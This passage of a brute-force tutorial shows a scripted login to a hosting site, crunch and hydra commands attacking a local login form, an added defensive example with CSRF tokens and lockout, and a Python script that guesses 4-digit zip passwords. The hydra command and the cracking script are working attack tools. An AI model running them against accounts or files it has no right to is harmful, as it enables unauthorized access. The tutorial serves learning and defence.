```php
$http->post('username', '****')
     ->post('password', '****')
     ->post('action', 'login2')
     ->fetch('https://www.value-domain.com/login.php');
```
Without a CSRF-protection token, the login form is easily attacked.
### Brute-force with hydra
```
$ crunch 4 4 -o password.txt
$ hydra -l test -P password.txt 127.0.0.1 http-post-form '/login_sql.php:name=^USER^&password=^PASS^:ログイン失敗です'
```
hydra github
https://github.com/vanhauser-thc/thc-hydra
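Seen from the server side, the two weaknesses noted above (a login form with no token, and unlimited guessing against a small keyspace) can be closed as in the following added example, which is not code from the original page. The names `LoginGuard`, `issue_token`, `passwords_tested`, the thresholds and the sample account are all assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumed per-deployment secret
MAX_FAILURES = 5                      # assumed lockout threshold
WINDOW_SECONDS = 300                  # assumed sliding window
USERS = {"test": "4821"}              # constructed sample; real stores hold password hashes

def issue_token(session_id):
    """Value placed in a hidden field of the login form, bound to the session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def check_password(user, password):
    stored = USERS.get(user, "")
    return hmac.compare_digest(stored.encode(), password.encode()) and user in USERS

class LoginGuard:
    def __init__(self):
        self.failures = {}  # user -> timestamps of recent failed logins

    def attempt(self, session_id, token, user, password, now):
        # Reject posts that do not carry the token issued with the form.
        expected = issue_token(session_id).encode()
        if not hmac.compare_digest(expected, (token or "").encode()):
            return "bad_token"
        # Keep only failures inside the window, then enforce the limit
        # before the password is looked at.
        recent = [t for t in self.failures.get(user, []) if now - t < WINDOW_SECONDS]
        self.failures[user] = recent
        if len(recent) >= MAX_FAILURES:
            return "locked"
        if check_password(user, password):
            self.failures.pop(user, None)
            return "ok"
        recent.append(now)
        return "failed"

def passwords_tested(guard, session_id, user, guesses, now=0.0):
    """Count how many guesses in one burst reach the password check."""
    token = issue_token(session_id)
    results = [guard.attempt(session_id, token, user, g, now) for g in guesses]
    return sum(r in ("failed", "ok") for r in results)
```

A per-account counter can be tripped by a third party to lock a user out, so deployments often key it on account plus source address or add a delay instead of a hard lock.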
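### Brute-force attack on a 4-digit password with Python
```python
import random
import zipfile

import pandas as pd

file_path = 'energy.zip'
size = 4
chars = '0123456789'
count = 0
numbers = []  # every candidate password that was tried

with zipfile.ZipFile(file_path, 'r') as zf:
    for i in range(100000):
        # Draw a random 4-digit candidate (candidates can repeat)
        pwd = bytes(''.join(random.choices(chars, k=size)), 'UTF-8')
        numbers.append(pwd)
        try:
            zf.extractall(path='.', pwd=pwd)
            # Message: "The password of this PDF file is {}"
            print('このPDFファイルのパスワードは、{}です'.format(pwd))
            break
        except Exception as e:
            count += 1

# Message: "Number of extraction attempts made by the brute-force attack: N"
print('総当たり攻撃で解凍を試した回数は:' + str(count) + '回です')
df = pd.DataFrame(numbers)
```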